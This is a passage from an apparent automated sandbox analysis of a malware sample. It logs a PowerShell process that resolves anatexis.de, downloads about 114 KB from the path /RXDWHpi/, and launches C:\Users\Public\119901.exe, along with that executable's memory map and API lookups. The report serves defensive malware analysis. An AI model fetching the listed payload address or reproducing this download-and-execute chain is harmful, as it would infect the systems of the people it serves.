| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
6 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
6 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\Public\119901.exe | show_window = SW_SHOWNORMAL |
|
1 |
Module (4)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Map | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (7)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Info | type = Operating System |
|
5 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Mutex (23)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
5 | |
| Release | mutex_name = Global\.net clr networking |
|
5 |
Environment (120)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
113 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = public, result_out = C:\Users\Public |
|
2 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Network Behavior
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = anatexis.de, address_out = 81.169.145.93 |
|
1 |
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 69 bytes |
| Total Data Received | 114.02 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | anatexis.de |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | anatexis.de |
| Server Port | 80 |
| Data Sent | 69 |
| Data Received | 116755 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = anatexis.de, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /RXDWHpi/ |
|
1 | |
| Send HTTP Request | headers = host: anatexis.de, connection: Keep-Alive, url = anatexis.de/RXDWHpi/ |
|
1 | |
| Read Response | size = 4096, size_out = 1460 |
|
1 | |
| Read Response | size = 6952, size_out = 6952 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 8000, size_out = 8000 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 8000, size_out = 8000 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 8000, size_out = 8000 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 8000, size_out = 307 |
|
1 | |
| Read Response | size = 7693, size_out = 2607 |
|
1 | |
| Read Response | size = 5086, size_out = 5086 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 8000, size_out = 4374 |
|
1 | |
| Read Response | size = 3626, size_out = 1452 |
|
1 | |
| Read Response | size = 2174, size_out = 2174 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 8000, size_out = 2914 |
|
1 | |
| Read Response | size = 5086, size_out = 1460 |
|
1 | |
| Read Response | size = 3626, size_out = 3626 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 8000, size_out = 5834 |
|
1 | |
| Read Response | size = 2166, size_out = 2166 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 8000, size_out = 2206 |
|
1 | |
| Read Response | size = 5794, size_out = 2920 |
|
1 | |
| Read Response | size = 2874, size_out = 2874 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 8000, size_out = 8000 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 8000, size_out = 8000 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 8000, size_out = 8000 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 8000, size_out = 8000 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 8000, size_out = 8000 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 4224, size_out = 1504 |
|
1 | |
| Read Response | size = 2720, size_out = 1452 |
|
1 | |
| Read Response | size = 1268, size_out = 1268 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
3 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Close Session | - |
|
1 |
Process #4: 119901.exe
28
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\users\public\119901.exe |
| Command Line | "C:\Users\Public\119901.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:01, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:31 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbe0 |
| Parent PID | 0xb28 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BE4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00296fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002c2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002ddfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002edfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0030ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| 119901.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000430000 | 0x00430000 | 0x005b7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x006fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00880fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x01c8ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01d1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d20000 | 0x01d20000 | 0x02112fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02120000 | 0x023eefff | Memory Mapped File | Readable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
Module (27)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x75570000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x74cb0000 |
|
2 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x75570000 |
|
1 | |
| Get Filename | c:\windows\syswow64\user32.dll | process_name = c:\users\public\119901.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fac0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fac8 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fb50 |
|
2 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
